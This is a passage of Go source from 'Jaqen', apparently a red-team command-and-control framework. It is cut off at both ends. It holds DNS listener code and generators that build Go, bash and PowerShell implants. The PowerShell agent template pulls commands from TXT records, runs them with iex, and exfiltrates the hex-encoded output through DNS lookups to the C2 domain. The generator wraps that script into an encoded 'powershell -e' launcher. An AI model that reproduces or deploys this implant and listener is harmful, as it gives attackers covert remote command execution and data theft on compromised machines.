 34 | 	return "dns"
 35 | }
 36 | 
 37 | func (d *JaqenDNSListener) Kill(agent string) {
 38 | 	d.SendCommand(agent, "exit")
 39 | }
 40 | 
 41 | func popArray(sa []string) ([]string, string) {
 42 | 	if len(sa) < 1 {
 43 | 		return sa, "NoCMD"
 44 | 	}
 45 | 	r := sa[0]
 46 | 	return sa[1:], r
 47 | }
 48 | 
 49 | func (d *JaqenDNSListener) SendCommand(agent, command string) {
 50 | 	d.pcMut.Lock()
 51 | 	defer d.pcMut.Unlock()
 52 | 
 53 | 	d.pendingCommands[agent] = append(d.pendingCommands[agent], command)
 54 | }
 55 | 
 56 | func (d *JaqenDNSListener) Stop() {
 57 | 	close(d.closeChan)
 58 | 	d.server.Shutdown()
 59 | 	d.running = false
 60 | 
 61 | }
 62 | 
 63 | func (d *JaqenDNSListener) Init() (server.SignalChans, error) {
 64 | 	x := new(sync.RWMutex)
 65 | 	d.optionsMut = x
 66 | 	d.options = make(map[string]string)
 67 | 	d.pendingCommands = make(map[string][]string)
 68 | 	d.pcMut = &sync.RWMutex{}
 69 | 	d.dnsCheckinChan = make(chan dnsresponse, 200)
 70 | 
 71 | 	d.CheckinChan = make(chan server.Checkin, 10)
 72 | 	d.ResponseChan = make(chan server.Command, 10)
 73 | 	d.options["domain"] = ""
 74 | 	d.options["split"] = "60"
 75 | 	d.options["checkintime"] = "10000"
 76 | 	d.options["exectime"] = "10000"
 77 | 
 78 | 	d.options["cgo"] = "0"
 79 | 	d.options["goos"] = build.Default.GOOS // os.Getenv("GOOS")
 80 | 	d.options["goarch"] = build.Default.GOARCH
 81 | 	d.options["goroot"] = build.Default.GOROOT
 82 | 	d.options["gopath"] = build.Default.GOPATH
 83 | 	d.options["outfile"] = ""
 84 | 
 85 | 	r := server.SignalChans{
 86 | 		CheckinChan:  d.CheckinChan,
 87 | 		ResponseChan: d.ResponseChan,
 88 | 	}
 89 | 
 90 | 	cm = dnscommandManager{}
 91 | 	cm.Init()
 92 | 
 93 | 	d.closeChan = make(chan struct{})
 94 | 
 95 | 	d.running = false
 96 | 
 97 | 	return r, nil
 98 | }
 99 | 
100 | func (d *JaqenDNSListener) GetOptions() func(string) []string {
101 | 	d.optionsMut.RLock()
102 | 	defer d.optionsMut.RUnlock()
103 | 	return func(line string) []string {
104 | 		a := make([]string, 0)
105 | 		for k, _ := range d.options { //other options go here?
106 | 			a = append(a, k)
107 | 		}
108 | 		return a
109 | 	}
110 | }
111 | 
112 | func (d *JaqenDNSListener) GetOption(s string) (string, error) {
113 | 	d.optionsMut.RLock()
114 | 	defer d.optionsMut.RUnlock()
115 | 	if x, ok := d.options[s]; ok {
116 | 		return x, nil
117 | 	}
118 | 	return "", errors.New("Option not found")
119 | }
120 | 
121 | func (d *JaqenDNSListener) SetOption(key, value string) {
122 | 	d.optionsMut.Lock()
123 | 	defer d.optionsMut.Unlock()
124 | 	d.options[key] = value
125 | }
126 | 
127 | func (d *JaqenDNSListener) Start() error {
128 | 
129 | 	d.server = d.dothething()
130 | 	d.closeChan = make(chan struct{})
131 | 	go d.monitorCheckins(d.closeChan)
132 | 	fmt.Println("Started DNS Listener")
133 | 	d.running = true
134 | 	return nil
135 | }
136 | 
137 | func (d *JaqenDNSListener) monitorCheckins(quit chan struct{}) {
138 | 	for {
139 | 		select {
140 | 		case _, ok := <-quit:
141 | 			if !ok {
142 | 				return
143 | 			}
144 | 		case x := <-d.dnsCheckinChan:
145 | 			d.CheckinChan <- server.Checkin{
146 | 				UID:          x.UID,
147 | 				ListenerName: d.GetName(),
148 | 				CheckinTime:  time.Now(),
149 | 			}
150 | 
151 | 		}
152 | 	}
153 | }
154 | 
155 | func (d *JaqenDNSListener) dothething() *dns.Server {
156 | 	uuidChan := make(chan string, 20)
157 | 	d.optionsMut.RLock()
158 | 	domain := d.options["domain"] //maybe allow multiple? idk
159 | 	d.optionsMut.RUnlock()
160 | 
161 | 	dns.HandleFunc(domain+".", func(w dns.ResponseWriter, r *dns.Msg) { d.handleDNS(w, r, "127.0.0.1", uuidChan, domain) })
162 | 
163 | 	// start DNS server
164 | 	server := &dns.Server{Addr: "0.0.0.0" + ":53", Net: "udp"}
165 | 	go func() {
166 | 		err := server.ListenAndServe()
167 | 
168 | 		if err != nil {
169 | 			fmt.Println("Server error: ", err)
170 | 		}
171 | 		defer d.Stop()
172 | 	}()
173 | 	return server
174 | }
175 | 
176 | func (j *JaqenDNSListener) handleDNS(w dns.ResponseWriter, r *dns.Msg, EXT_IP string, uuidChan chan string, domain string) {
177 | 	// many thanks to the original author of this function
178 | 	m := &dns.Msg{
179 | 		Compress: false,
180 | 	}
181 | 	m.SetReply(r)
182 | 	m.Authoritative = true
183 | 	m.RecursionAvailable = true
184 | 	j.parseDNS(m, w.RemoteAddr().String(), EXT_IP, uuidChan, domain)
185 | 	w.WriteMsg(m)
186 | }
187 | 
188 | func (j *JaqenDNSListener) parseDNS(m *dns.Msg, ipaddr string, EXT_IP string, uuidChan chan string, domain string) {
189 | 	// for each DNS question to our nameserver
190 | 	// there can be multiple questions in the question section of a single request
191 | 	for _, q := range m.Question {
192 | 		//received a A request (probably a client returning a response, or checking in)
193 | 		if q.Qtype == dns.TypeA {
194 | 			//todo:all of these should be encapsulated in an encrypted blob
195 | 			//<payload>.<chunknumber>.<maxmessagechunks>.<cmdid>.<uid>.<c2.domain.here.please>
196 | 			//working backwards in this function intentionally.
197 | 			//Trying to decide if recursion shoudl be used to use the whole 200 char space of dns names for large payloads
198 | 			z := strings.Split(q.Name, ".")
199 | 			if len(z) < len(strings.Split(domain, ".")) { //todo: allow multiple domains
200 | 				continue
201 | 			}
202 | 			z = z[:len(z)-(len(strings.Split(domain, "."))+1)]
203 | 			if len(z) != 5 && len(z) != 1 {
204 | 				fmt.Println("oh boy")
205 | 				continue
206 | 			}
207 | 			//last value is the uid of the command
208 | 			uid := z[len(z)-1]
209 | 			if len(z) == 5 {
210 | 				//next is cmdid
211 | 				cmdID := z[len(z)-2]
212 | 				//next is the max chunks
213 | 				maxChunks := z[len(z)-3]
214 | 				//then the chunk being sent
215 | 				thisChunk := z[len(z)-4]
216 | 				//and finally our payload
217 | 				payloads := z[:len(z)-4]
218 | 				payload := strings.Join(payloads, "")
219 | 
220 | 				cm.UpdateCmd(cmdID, maxChunks, thisChunk, payload)
221 | 				//check if cmd done
222 | 				if cm.IsDone(cmdID) {
223 | 					j.ResponseChan <- server.Command{
224 | 						UID:      uid,
225 | 						Cmd:      cm.GetCommand(cmdID).Command,
226 | 						Response: []byte(cm.GetCommand(cmdID).Response.ReadResposne()),
227 | 					}
228 | 					cm.ClearCommand(cmdID)
229 | 					//j.dnsResponseChan <- cm.GetCommand(cmdID).Response
230 | 				}
231 | 			} else {
232 | 				j.dnsCheckinChan <- dnsresponse{UID: uid}
233 | 			}
234 | 			r := dns.A{}
235 | 			r.Hdr = dns.RR_Header{
236 | 				Name:   q.Name,
237 | 				Rrtype: dns.TypeA,
238 | 				Class:  dns.ClassINET,
239 | 				Ttl:    10,
240 | 			}
241 | 			r.A = net.ParseIP("127.0.0.1") //can probably use this to signal good/bad
242 | 			rr, _ := dns.NewRR(r.String())
243 | 			m.Answer = append(m.Answer, rr)
244 | 		}
245 | 		//received a TXT request (probably a client looking for commands)
246 | 		if q.Qtype == dns.TypeTXT {
247 | 			//check if we have a pending command to send
248 | 			z := strings.Split(q.Name, ".")
249 | 			//cmdid.uid.c2.domain.here.please
250 | 			if len(z) < len(strings.Split(domain, ".")) {
251 | 				continue
252 | 			}
253 | 			z = z[:len(z)-(len(strings.Split(domain, "."))+1)]
254 | 			//uuid := z[len(z)-1]
255 | 
256 | 			if len(z) < 2 {
257 | 				continue
258 | 			}
259 | 
260 | 			uid := z[len(z)-1]
261 | 			//next is the cmdid
262 | 			cmdid := z[len(z)-2]
263 | 
264 | 			//set agent cmdID
265 | 			r := dns.TXT{}
266 | 			r.Hdr = dns.RR_Header{
267 | 				Name:   q.Name,
268 | 				Rrtype: dns.TypeTXT,
269 | 				Class:  dns.ClassINET,
270 | 				Ttl:    10,
271 | 			}
272 | 
273 | 			//get command to send the agent
274 | 			j.pcMut.Lock()
275 | 			newArr, cmd := popArray(j.pendingCommands[uid])
276 | 			j.pendingCommands[uid] = newArr
277 | 			j.pcMut.Unlock()
278 | 
279 | 			r.Txt = []string{cmd}
280 | 
281 | 			rr, _ := dns.NewRR(r.String())
282 | 			m.Answer = append(m.Answer, rr)
283 | 
284 | 			if cmd != "NoCMD" {
285 | 				//add to command manager
286 | 				c := DNSCommand{
287 | 					Command:  cmd,
288 | 					UID:      cmdid,
289 | 					Response: dnsresponse{},
290 | 				}
291 | 				cm.AddCommand(c)
292 | 				uuidChan <- uid
293 | 			} else {
294 | 				//cm.SetCommandToSend("NoCMD")
295 | 			}
296 | 		}
297 | 	}
298 | }
299 | 
300 | func (t JaqenDNSListener) GetInfo() server.ListenerInfo {
301 | 
302 | 	//copy the options map to avoid bad stuff
303 | 	t.optionsMut.Lock()
304 | 	newMap := make(map[string]string)
305 | 	for k, v := range t.options {
306 | 		newMap[k] = v
307 | 	}
308 | 	t.optionsMut.Unlock()
309 | 
310 | 	return server.ListenerInfo{
311 | 		Name:    t.GetName(),
312 | 		Running: t.running,
313 | 		Options: newMap,
314 | 	}
315 | }
316 | 
317 | func (t JaqenDNSListener) GenerateAgentFormats() []string {
318 | 	return []string{"powershell", "golang", "bash"}
319 | }
320 | 
321 | func (t JaqenDNSListener) Generate(s string) []byte {
322 | 	switch strings.ToLower(s) {
323 | 	case "powershell":
324 | 		return []byte(t.genPowershellAgent())
325 | 	case "golang":
326 | 		return t.genGolangAgent()
327 | 	case "bash":
328 | 		return []byte(t.genBashAgent())
329 | 	}
330 | 	return []byte{}
331 | }
332 | 


--------------------------------------------------------------------------------
/libJaqen/server/listeners/dnsListener/dnsagent.go:
--------------------------------------------------------------------------------
  1 | package dnsListener
  2 | 
  3 | import (
  4 | 	"bytes"
  5 | 	"encoding/base64"
  6 | 	"fmt"
  7 | 	"io/ioutil"
  8 | 	"os"
  9 | 	"path"
 10 | 	"strconv"
 11 | 	"text/template"
 12 | 
 13 | 	"github.com/c-sto/Jaqen/libJaqen/server"
 14 | 	"github.com/gobuffalo/packr"
 15 | 	"golang.org/x/text/encoding/unicode"
 16 | )
 17 | 
 18 | func (d JaqenDNSListener) genGolangAgent() []byte {
 19 | 	//Thanks to moloch-- and the rosie project for figuring out how to do the generation stuff mostly good https://github.com/moloch--/rosie
 20 | 	dom, _ := d.GetOption("domain")
 21 | 	checkinTime, _ := d.GetOption("checkintime")
 22 | 	execTime, _ := d.GetOption("exectime")
 23 | 
 24 | 	codeStruct := server.AgentCode{
 25 | 		CmdExecTimeout: execTime,
 26 | 		CheckinMaxTime: checkinTime,
 27 | 		Imports: `*/	
 28 | 		"encoding/hex"
 29 | 		"os"
 30 | 		"fmt"
 31 | 		"net"
 32 | 		/*`,
 33 | 		GlobalVars: `
 34 | 		*/const payloadSizeMax = 62
 35 | /*
 36 | `,
 37 | 		Checkin: `*/	
 38 | 		net.LookupIP(a.uid + "." + a.settings.Get("c2Domain"))
 39 | 		/*`,
 40 | 		Init: `*/	
 41 | 		a.settings.Set("c2Domain", "` + dom + `")
 42 | 		/*`,
 43 | 		GetCommand: `*/
 44 | 		cmdID := RandStringRunes(4)
 45 | 		lookupAddr := fmt.Sprintf("%s.%s.%s", cmdID, a.uid, a.settings.Get("c2Domain"))
 46 | 		command, err := net.LookupTXT(lookupAddr)
 47 | 		if err != nil {
 48 | 			panic(err)
 49 | 		}
 50 | 	
 51 | 		a.cmd, a.cmdID = command[0], cmdID
 52 | 	
 53 | 		if a.cmd != "NoCMD" {
 54 | 			return true
 55 | 		}
 56 | 		if a.cmd == "exit"{
 57 | 			os.Exit(0)
 58 | 		}
 59 | 		/*`,
 60 | 		ExecCommand: `*//*`,
 61 | 		SendResponse: `*/	
 62 | 		encodedResult := hex.EncodeToString(b)
 63 | 		blocks := len(encodedResult) / payloadSizeMax
 64 | 		leftover := len(encodedResult) % payloadSizeMax
 65 | 		if leftover > 0 {
 66 | 			blocks++
 67 | 		}
 68 | 	
 69 | 		for x := 1; x <= blocks; x++ {
 70 | 			minVal := (x - 1) * payloadSizeMax
 71 | 			maxVal := x * payloadSizeMax
 72 | 			if maxVal > len(encodedResult) {
 73 | 				maxVal = len(encodedResult)
 74 | 			}
 75 | 			payload := encodedResult[minVal:maxVal]
 76 | 			chunknumber := x
 77 | 			maxChunks := blocks
 78 | 			lookupaddr := fmt.Sprintf("%s.%d.%d.%s.%s.%s", payload, chunknumber, maxChunks, a.cmdID, a.uid, a.GetSetting("c2Domain"))
 79 | 	
 80 | 			go func() {
 81 | 				for {
 82 | 					x, err := net.LookupIP(lookupaddr)
 83 | 					if err != nil {
 84 | 						continue
 85 | 					}
 86 | 					z := net.ParseIP("127.0.0.1")
 87 | 					if z.Equal(x[0]) {
 88 | 						break
 89 | 					}
 90 | 					time.Sleep(time.Duration(3)*time.Second) //arbitrary sleep retry value (1 was too low, got repeated responses)
 91 | 				}
 92 | 			}()
 93 | 	
 94 | 		}
 95 | 		/*`,
 96 | 	}
 97 | 
 98 | 	codeStruct.AVoid("")
 99 | 
100 | 	boxs, err := packr.NewBox("../../../").MustString("agent/agent.go")
101 | 	if err != nil {
102 | 		fmt.Println(err)
103 | 		return []byte("")
104 | 	}
105 | 
106 | 	code, err := template.New("goagent").Parse(boxs)
107 | 	if err != nil {
108 | 		fmt.Println(err)
109 | 		return []byte("")
110 | 	}
111 | 
112 | 	var buf bytes.Buffer
113 | 
114 | 	err = code.Execute(&buf, codeStruct)
115 | 
116 | 	if err != nil {
117 | 		fmt.Println(err)
118 | 	}
119 | 
120 | 	binDir, err := ioutil.TempDir("", "jaqen-build")
121 | 
122 | 	if err != nil {
123 | 		fmt.Println(err)
124 | 	}
125 | 
126 | 	workingDir := path.Join(binDir, "agent.go")
127 | 
128 | 	fmt.Println("working", workingDir)
129 | 	codeFile, err := os.Create(workingDir)
130 | 	if err != nil {
131 | 		fmt.Println(err)
132 | 	}
133 | 
134 | 	fmt.Println("Generating code to: " + codeFile.Name())
135 | 
136 | 	err = code.Execute(codeFile, codeStruct)
137 | 
138 | 	if err != nil {
139 | 		fmt.Println(err)
140 | 	}
141 | 
142 | 	cgo, err := d.GetOption("cgo")
143 | 	if err != nil {
144 | 		cgo = "0"
145 | 	}
146 | 	goos, err := d.GetOption("goos")
147 | 	if err != nil {
148 | 		goos = "windows"
149 | 	}
150 | 	goarch, err := d.GetOption("goarch")
151 | 	if err != nil {
152 | 		goos = "x64"
153 | 	}
154 | 
155 | 	outfile, _ := d.GetOption("outfile")
156 | 
157 | 	buildr := []string{"build"}
158 | 	if outfile != "" {
159 | 		buildr = append(buildr, "-o")
160 | 		buildr = append(buildr, outfile)
161 | 	}
162 | 
163 | 	goroot := server.GetGoRoot()
164 | 	gopath := server.GetGoPath()
165 | 
166 | 	err = server.GoCmd(server.GoConfig{
167 | 		CGO:    cgo,
168 | 		GOOS:   goos,
169 | 		GOARCH: goarch,
170 | 		GOROOT: goroot,
171 | 		GOPATH: gopath,
172 | 	},
173 | 		binDir,
174 | 		buildr,
175 | 	)
176 | 
177 | 	if err != nil {
178 | 		fmt.Println(err)
179 | 		return []byte{}
180 | 	}
181 | 
182 | 	return []byte{} //buf.Bytes()
183 | }
184 | 
185 | type powershellagent struct {
186 | 	Domain string
187 | 	Split  int
188 | }
189 | 
190 | func (d JaqenDNSListener) genBashAgent() string {
191 | 	dom, _ := d.GetOption("domain")
192 | 
193 | 	spl := 60
194 | 
195 | 	st, e := d.GetOption("split")
196 | 	if e == nil {
197 | 		spl, e = strconv.Atoi(st)
198 | 		if e != nil {
199 | 			fmt.Println(e)
200 | 		}
201 | 	}
202 | 
203 | 	cfg := powershellagent{
204 | 		Domain: dom,
205 | 		Split:  spl,
206 | 	}
207 | 	boxs, err := packr.NewBox("./").MustString("bashdnsagent.sh")
208 | 
209 | 	if err != nil {
210 | 		fmt.Println(err)
211 | 		return ""
212 | 	}
213 | 	code, err := template.New("bashdnsagent").Parse(boxs)
214 | 	if err != nil {
215 | 		fmt.Println(err)
216 | 		return ""
217 | 	}
218 | 	var buf bytes.Buffer
219 | 
220 | 	err = code.Execute(&buf, cfg)
221 | 	if err != nil {
222 | 		fmt.Println(err)
223 | 	}
224 | 	return buf.String()
225 | }
226 | 
227 | func (d JaqenDNSListener) genPowershellAgent() string {
228 | 	dom, _ := d.GetOption("domain")
229 | 
230 | 	spl := 60
231 | 
232 | 	st, e := d.GetOption("split")
233 | 	if e == nil {
234 | 		spl, e = strconv.Atoi(st)
235 | 		if e != nil {
236 | 			fmt.Println(e)
237 | 		}
238 | 	}
239 | 
240 | 	cfg := powershellagent{
241 | 		Domain: dom,
242 | 		Split:  spl,
243 | 	}
244 | 	boxs, err := packr.NewBox("./").MustString("dnsagent.ps1")
245 | 
246 | 	if err != nil {
247 | 		fmt.Println(err)
248 | 		return ""
249 | 	}
250 | 	code, err := template.New("dnsagent").Parse(boxs)
251 | 	if err != nil {
252 | 		fmt.Println(err)
253 | 		return ""
254 | 	}
255 | 	var buf bytes.Buffer
256 | 
257 | 	err = code.Execute(&buf, cfg)
258 | 	if err != nil {
259 | 		fmt.Println(err)
260 | 	}
261 | 	x, _ := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewEncoder().String(buf.String())
262 | 	return "powershell -e " + base64.StdEncoding.EncodeToString([]byte(x))
263 | 	//return x //buf.String()
264 | }
265 | 


--------------------------------------------------------------------------------
/libJaqen/server/listeners/dnsListener/dnsagent.ps1:
--------------------------------------------------------------------------------
1 | $url="{{.Domain}}";$uidr=Get-Random;$uid=$uidr.toString()+"";function execDNS{Param([parameter(position=0)]$cmd,[parameter(position=1)]$cmdid)$cmd=[system.String]$cmd;$c=(iex $cmd)2>&1|Out-String;$string=($c|Format-Hex|Select-Object -Expand Bytes|ForEach-Object{'{0:x2}' -f $_}) -join '';$len=$string.Length;$split={{.Split}};$repeat=[Math]::Floor($len/$split);$remainder=$len%$split;$repeatr=$repeat;if($remainder){$repeatr=$repeat+1;};for($i=0;$i -lt $repeat;$i++){$str=$string.Substring($i*$Split,$Split);$durl=$str+"."+($i+1)+"."+$repeatr+"."+$cmdid+"."+$uid+"."+$url;$q=resolve-dnsname -Name $durl -type 1;};if($remainder){$str=$string.Substring($len-$remainder);$durl2=$str+"."+($i+1)+"."+$repeatr+"."+$cmdid+"."+$uid+"."+$url;$q=resolve-dnsname -type 1 $durl2;};};while(1){$checkin=$uid+"."+$url;$q=resolve-dnsname -type 1 -Name $checkin;$c=Get-Random;$cs=$c.ToString();Start-Sleep -s 5;$u=$cs+"."+$uid+"."+$url;$txt=resolve-dnsname -type 16 -dnsonly $u|select-object Strings|%{$_.Strings}|Out-String;$txt=$txt-replace"`n|`r";if($txt -match'NoCMD'){continue}elseif($txt -match'exit'){Exit}else{execDNS -cmd $txt -cmdid $cs};};


--------------------------------------------------------------------------------
/libJaqen/server/listeners/dnsListener/dnscommandManager.go:
--------------------------------------------------------------------------------
  1 | package dnsListener
  2 | 
  3 | import (
  4 | 	"encoding/hex"
  5 | 	"fmt"
  6 | 	"sort"
  7 | 	"strconv"
  8 | 	"sync"
  9 | )
 10 | 
 11 | /*
 12 | type dnsresponse struct {
 13 | 	Chunks      []dnschunk
 14 | 	TotalChunks int64
 15 | 	ReadChunks  int64
 16 | }*/
 17 | 
 18 | type dnsresponse struct {
 19 | 	UID         string
 20 | 	MaxChunks   string
 21 | 	ThisChunk   string
 22 | 	Payload     string
 23 | 	CmdID       string
 24 | 	Response    []byte
 25 | 	Chunks      []dnschunk
 26 | 	TotalChunks int64
 27 | 	ReadChunks  int64
 28 | }
 29 | 
 30 | type dnschunk struct {
 31 | 	Body string
 32 | 	Num  int64
 33 | }
 34 | 
 35 | type DNSCommand struct {
 36 | 	Command  string
 37 | 	UID      string
 38 | 	CmdID    string
 39 | 	Response dnsresponse
 40 | }
 41 | 
 42 | type dnscommandManager struct {
 43 | 	commandMap     map[string]DNSCommand
 44 | 	cMMutex        *sync.RWMutex
 45 | 	waitingCommand string
 46 | }
 47 | 
 48 | func (cm *dnscommandManager) Init() {
 49 | 	cm.commandMap = make(map[string]DNSCommand)
 50 | 	cm.cMMutex = &sync.RWMutex{}
 51 | 
 52 | }
 53 | 
 54 | func (cm dnscommandManager) GetCommandToSend() string {
 55 | 	cm.cMMutex.RLock()
 56 | 	defer cm.cMMutex.RUnlock()
 57 | 	return cm.waitingCommand
 58 | }
 59 | 
 60 | func (cm *dnscommandManager) GetCommand(c string) DNSCommand {
 61 | 	cm.cMMutex.RLock()
 62 | 	defer cm.cMMutex.RUnlock()
 63 | 	if v, ok := cm.commandMap[c]; ok {
 64 | 		return v
 65 | 	}
 66 | 	return DNSCommand{}
 67 | }
 68 | 
 69 | func (cm *dnscommandManager) ClearCommand(c string) {
 70 | 	cm.cMMutex.Lock()
 71 | 	defer cm.cMMutex.Unlock()
 72 | 	delete(cm.commandMap, c)
 73 | }
 74 | 
 75 | func (cm *dnscommandManager) SetCommandToSend(s string) {
 76 | 	cm.cMMutex.Lock()
 77 | 	defer cm.cMMutex.Unlock()
 78 | 	cm.waitingCommand = s
 79 | }
 80 | 
 81 | //uuid == cmdid
 82 | func (cm *dnscommandManager) UpdateCmd(uuid, maxchunks, thischunk, vals string) {
 83 | 	cm.cMMutex.Lock()
 84 | 	defer cm.cMMutex.Unlock()
 85 | 	c, ok := cm.commandMap[uuid]
 86 | 
 87 | 	if !ok {
 88 | 		return
 89 | 	}
 90 | 
 91 | 	cn, e := strconv.ParseInt(thischunk, 10, 64)
 92 | 	if e != nil {
 93 | 		fmt.Println("Bad chunk number: ", e)
 94 | 		return
 95 | 	}
 96 | 	mc, e := strconv.ParseInt(maxchunks, 10, 64)
 97 | 	if e != nil {
 98 | 		fmt.Println("Bad max chunk number: ", e)
 99 | 		return
100 | 	}
101 | 	c.Response.TotalChunks = mc
102 | 	c.Response.AddChunk(cn, vals)
103 | 	cm.commandMap[uuid] = c
104 | 
105 | 	fmt.Println(fmt.Sprintf("Recv %d of %d", c.Response.ReadChunks, c.Response.TotalChunks))
106 | 
107 | }
108 | 
109 | func (cm *dnscommandManager) AddCommand(c DNSCommand) {
110 | 	cm.cMMutex.Lock()
111 | 	defer cm.cMMutex.Unlock()
112 | 	cm.commandMap[c.UID] = c
113 | }
114 | 
115 | func (r *dnsresponse) AddChunk(cnum int64, val string) {
116 | 	for _, x := range r.Chunks {
117 | 		if x.Num == cnum {
118 | 			return
119 | 		}
120 | 	}
121 | 	r.Chunks = append(r.Chunks, dnschunk{Body: val, Num: cnum})
122 | 	r.ReadChunks++
123 | }
124 | 
125 | func (cm *dnscommandManager) IsDone(cmdId string) bool {
126 | 	c := cm.GetCommand(cmdId).Response
127 | 	return c.IsDone()
128 | }
129 | 
130 | func (r dnsresponse) IsDone() bool {
131 | 	if r.TotalChunks == 0 || r.TotalChunks > r.ReadChunks {
132 | 		return false
133 | 	}
134 | 	return true
135 | }
136 | 
137 | func (r dnsresponse) ReadResposne() string {
138 | 	//sort chunks
139 | 	rval := ""
140 | 	sort.Slice(r.Chunks, func(i, j int) bool {
141 | 		if r.Chunks[i].Num < r.Chunks[j].Num {
142 | 			return true
143 | 		}
144 | 		return false
145 | 	})
146 | 	for _, x := range r.Chunks {
147 | 		rval += x.Body
148 | 	}
149 | 
150 | 	v, e := hex.DecodeString(rval)
151 | 	if e != nil {
152 | 		fmt.Println("ReadResponse Error:", e)
153 | 	}
154 | 	return string(v)
155 | }
156 | 


--------------------------------------------------------------------------------
/libJaqen/server/listeners/encryptedDNSListener/encryptedDNS.go:
--------------------------------------------------------------------------------
  1 | package encryptedDNSListener
  2 | 
  3 | import (
  4 | 	"encoding/base64"
  5 | 	"errors"
  6 | 	"fmt"
  7 | 	"go/build"
  8 | 	"net"
  9 | 	"strings"
 10 | 	"sync"
 11 | 	"time"
 12 | 
 13 | 	"github.com/miekg/dns"
 14 | 
 15 | 	"github.com/c-sto/Jaqen/libJaqen/server"
 16 | 	"github.com/c-sto/Jaqen/libJaqen/server/util"
 17 | )
 18 | 
 19 | var cm dnsCommandManager
 20 | 
 21 | type JaqenEncryptedDNSListener struct {
 22 | 	running         bool
 23 | 	options         map[string]string
 24 | 	optionsMut      *sync.RWMutex
 25 | 	dnsCheckinChan  chan dnsresponse
 26 | 	dnsResponseChan chan dnsresponse
 27 | 	closeChan       chan struct{}
 28 | 	CheckinChan     chan server.Checkin
 29 | 	ResponseChan    chan server.Command
 30 | 	pendingCommands map[string][]string
 31 | 	pcMut           *sync.RWMutex
 32 | 	server          *dns.Server
 33 | }
 34 | 
 35 | func (d JaqenEncryptedDNSListener) GetName() string {
 36 | 	return "secure-dns"
 37 | }
 38 | 
 39 | func (d *JaqenEncryptedDNSListener) Kill(agent string) {
 40 | 	d.SendCommand(agent, "exit")
 41 | }
 42 | 
 43 | func popArray(sa []string, key []byte) ([]string, string) {
 44 | 	if len(sa) < 1 {
 45 | 		nc, _ := util.EncryptStringToHex("NoCMD", key)
 46 | 		return sa, nc
 47 | 	}
 48 | 	r := sa[0]
 49 | 	return sa[1:], r
 50 | }
 51 | 
 52 | func (d *JaqenEncryptedDNSListener) SendCommand(agent, command string) {
 53 | 	//get byte slice of key
 54 | 	ec, e := d.GetOption("key")
 55 | 	if e != nil {
 56 | 		fmt.Println(e)
 57 | 		return
 58 | 	}
 59 | 	k, e := base64.StdEncoding.DecodeString(ec)
 60 | 	if e != nil {
 61 | 		fmt.Println(e)
 62 | 		return
 63 | 	}
 64 | 	command, e = util.EncryptStringToHex(command, k)
 65 | 	if e != nil {
 66 | 		fmt.Println(e)
 67 | 		return
 68 | 	}
 69 | 
 70 | 	d.pcMut.Lock()
 71 | 	defer d.pcMut.Unlock()
 72 | 
 73 | 	d.pendingCommands[agent] = append(d.pendingCommands[agent], command)
 74 | }
 75 | 
 76 | func (d *JaqenEncryptedDNSListener) Stop() {
 77 | 	close(d.closeChan)
 78 | 	d.server.Shutdown()
 79 | 	d.running = false
 80 | 
 81 | }
 82 | 
 83 | func (d *JaqenEncryptedDNSListener) Init() (server.SignalChans, error) {
 84 | 	x := new(sync.RWMutex)
 85 | 	key, e := util.GenerateRandomBytes(32)
 86 | 	if e != nil {
 87 | 		return server.SignalChans{}, e
 88 | 		//todo: log an error
 89 | 	}
 90 | 	d.optionsMut = x
 91 | 	d.options = make(map[string]string)
 92 | 	d.pendingCommands = make(map[string][]string)
 93 | 	d.pcMut = &sync.RWMutex{}
 94 | 	d.dnsCheckinChan = make(chan dnsresponse, 200)
 95 | 
 96 | 	d.CheckinChan = make(chan server.Checkin, 10)
 97 | 	d.ResponseChan = make(chan server.Command, 10)
 98 | 	d.options["domain"] = ""
 99 | 	d.options["split"] = "60"
100 | 	d.options["checkintime"] = "10000"
101 | 	d.options["exectime"] = "10000"
102 | 	d.options["key"] = base64.StdEncoding.EncodeToString(key)
103 | 	fmt.Println("DNS C2 Key: ", base64.StdEncoding.EncodeToString(key))
104 | 
105 | 	d.options["cgo"] = "0"
106 | 	d.options["goos"] = build.Default.GOOS // os.Getenv("GOOS")
107 | 	d.options["goarch"] = build.Default.GOARCH
108 | 	d.options["goroot"] = build.Default.GOROOT
109 | 	d.options["gopath"] = build.Default.GOPATH
110 | 	d.options["outfile"] = ""
111 | 
112 | 	r := server.SignalChans{
113 | 		CheckinChan:  d.CheckinChan,
114 | 		ResponseChan: d.ResponseChan,
115 | 	}
116 | 
117 | 	cm = dnsCommandManager{}
118 | 	cm.Init()
119 | 
120 | 	d.closeChan = make(chan struct{})
121 | 
122 | 	d.running = false
123 | 
124 | 	return r, nil
125 | }
126 | 
127 | func (d *JaqenEncryptedDNSListener) GetOptions() func(string) []string {
128 | 	d.optionsMut.RLock()
129 | 	defer d.optionsMut.RUnlock()
130 | 	return func(line string) []string {
131 | 		a := make([]string, 0)
132 | 		for k, _ := range d.options { //other options go here?
133 | 			a = append(a, k)
134 | 		}
135 | 		return a
136 | 	}
137 | }
138 | 
139 | func (d *JaqenEncryptedDNSListener) GetOption(s string) (string, error) {
140 | 	d.optionsMut.RLock()
141 | 	defer d.optionsMut.RUnlock()
142 | 	if x, ok := d.options[s]; ok {
143 | 		return x, nil
144 | 	}
145 | 	return "", errors.New("Option not found")
146 | }
147 | 
148 | func (d *JaqenEncryptedDNSListener) SetOption(key, value string) {
149 | 	d.optionsMut.Lock()
150 | 	defer d.optionsMut.Unlock()
151 | 	d.options[key] = value
152 | }
153 | 
154 | func (d *JaqenEncryptedDNSListener) Start() error {
155 | 
156 | 	d.server = d.dothething()
157 | 	d.closeChan = make(chan struct{})
158 | 	go d.monitorCheckins(d.closeChan)
159 | 	fmt.Println("Started DNS Listener")
160 | 	d.running = true
161 | 	return nil
162 | }
163 | 
164 | func (d *JaqenEncryptedDNSListener) monitorCheckins(quit chan struct{}) {
165 | 	for {
166 | 		select {
167 | 		case _, ok := <-quit:
168 | 			if !ok {
169 | 				return
170 | 			}
171 | 		case x := <-d.dnsCheckinChan:
172 | 			d.CheckinChan <- server.Checkin{
173 | 				UID:          x.UID,
174 | 				ListenerName: d.GetName(),
175 | 				CheckinTime:  time.Now(),
176 | 			}
177 | 
178 | 		}
179 | 	}
180 | }
181 | 
182 | func (d *JaqenEncryptedDNSListener) dothething() *dns.Server {
183 | 	uuidChan := make(chan string, 20)
184 | 	d.optionsMut.RLock()
185 | 	domain := d.options["domain"] //maybe allow multiple? idk
186 | 	d.optionsMut.RUnlock()
187 | 
